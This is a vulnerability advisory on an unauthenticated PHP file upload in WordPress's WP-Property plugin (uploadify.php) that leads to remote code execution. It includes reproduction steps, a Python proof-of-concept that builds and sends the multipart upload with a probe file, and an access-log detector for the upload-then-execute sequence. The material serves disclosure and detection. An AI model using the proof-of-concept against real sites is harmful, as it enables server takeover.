WordPress WP-Property Unauthenticated File Upload Vulnerability Leading to Remote Code Execution
Vulnerability
A file upload vulnerability has been identified in the WP-Property plugin for WordPress, affecting versions through 1.35.0. The flaw is in the bundled third-party 'uploadify.php' script (shipped under the plugin's third-party/uploadify directory), which accepts uploads from unauthenticated users without restricting the file type. An attacker can therefore place arbitrary PHP files in a temporary directory under the web root and then request them, resulting in remote code execution on the server.
Impact
An unauthenticated remote attacker can upload a PHP file and then execute it by requesting its URL, running arbitrary code with the privileges of the PHP process. In practice that means full compromise of the WordPress installation and a foothold on the underlying host.
Reproduction
To reproduce, send a multipart/form-data POST request to 'wp-content/plugins/wp-property/third-party/uploadify/uploadify.php' with the PHP file in the 'Filedata' field and the destination directory in the 'folder' field. No WordPress session, cookie or nonce is required, so the request can be sent directly with curl or any HTTP client. Once the upload succeeds, request the file at its URL beneath the chosen upload directory; the server executes whatever PHP code it contains. A harmless probe (for example, a file that only echoes a fixed string) is enough to confirm execution without leaving a web shell behind.
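The following is an added example, not code from the advisory or from the WP-Property project. It builds the multipart POST described above and, on the defensive side, scans access-log lines for the upload-then-request pattern. The field names 'Filedata' and 'folder' and the uploadify.php path are taken from the advisory; the folder value, the probe file contents, the send helper and the sample log lines are assumptions constructed for illustration.

```python
"""
Added example, not code from the advisory or from the WP-Property project.
Field names 'Filedata' and 'folder' and the uploadify.php path come from the
advisory; the folder value, probe file, log format and log lines are assumed
or constructed for illustration.
"""
import re
import uuid
import http.client
from urllib.parse import urlsplit

UPLOADIFY_PATH = "wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"

# Assumed harmless probe: confirms execution without dropping a shell.
PROBE_NAME = "probe.php"
PROBE_BODY = b"<?php echo 'wp-property-probe:' . php_uname('s'); ?>"


def build_multipart(fields, file_field, filename, content):
    """Encode text fields plus one file part as multipart/form-data.
    Returns (Content-Type header value, body bytes)."""
    boundary = "----probe" + uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
        )
    parts.append(
        (f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
         f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n').encode()
        + content + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def build_upload_request(folder, filename=PROBE_NAME, content=PROBE_BODY):
    """Headers and body of the PoC POST. 'folder' is the directory the script is
    asked to write into; the value passed by the caller is the tester's assumption."""
    ctype, body = build_multipart({"folder": folder}, "Filedata", filename, content)
    return {"Content-Type": ctype, "Content-Length": str(len(body))}, body


def send_upload(base_url, folder, filename=PROBE_NAME, content=PROBE_BODY, timeout=10):
    """Send the PoC to a live site (network; not exercised by the offline check).
    Returns (HTTP status, response body)."""
    u = urlsplit(base_url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.netloc, timeout=timeout)
    headers, body = build_upload_request(folder, filename, content)
    conn.request("POST", u.path.rstrip("/") + "/" + UPLOADIFY_PATH, body=body, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


# Detection side: combined-format access log (constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_uploadify_abuse(log_lines):
    """Flag POSTs to uploadify.php, then any later GET of a .php file under
    wp-content by the same client: the upload-then-execute sequence above."""
    posters = set()
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group("ip", "method", "path", "status")
        if method == "POST" and path.endswith(UPLOADIFY_PATH):
            posters.add(ip)
            findings.append(("upload", ip, path, status))
        elif (method == "GET" and ip in posters and path.startswith("/wp-content/")
              and re.search(r"\.php(\?|$)", path)):
            findings.append(("execute", ip, path, status))
    return findings


SAMPLE_LOG = [  # constructed, not real traffic
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 64 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "GET /wp-content/uploads/tmp/probe.php HTTP/1.1" 200 35 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-content/plugins/wp-property/style.css HTTP/1.1" 200 1280 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    headers, body = build_upload_request("wp-content/uploads/tmp")  # assumed folder value
    print(headers["Content-Type"], len(body), "bytes")
    for finding in find_uploadify_abuse(SAMPLE_LOG):
        print(*finding)
```

The request builder is deliberately free of third-party dependencies so the exact bytes on the wire can be inspected before anything is sent; send_upload is the only function that touches the network. The log check keys on the same client IP issuing the POST and then fetching a .php file under wp-content, which is the sequence the reproduction steps produce.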
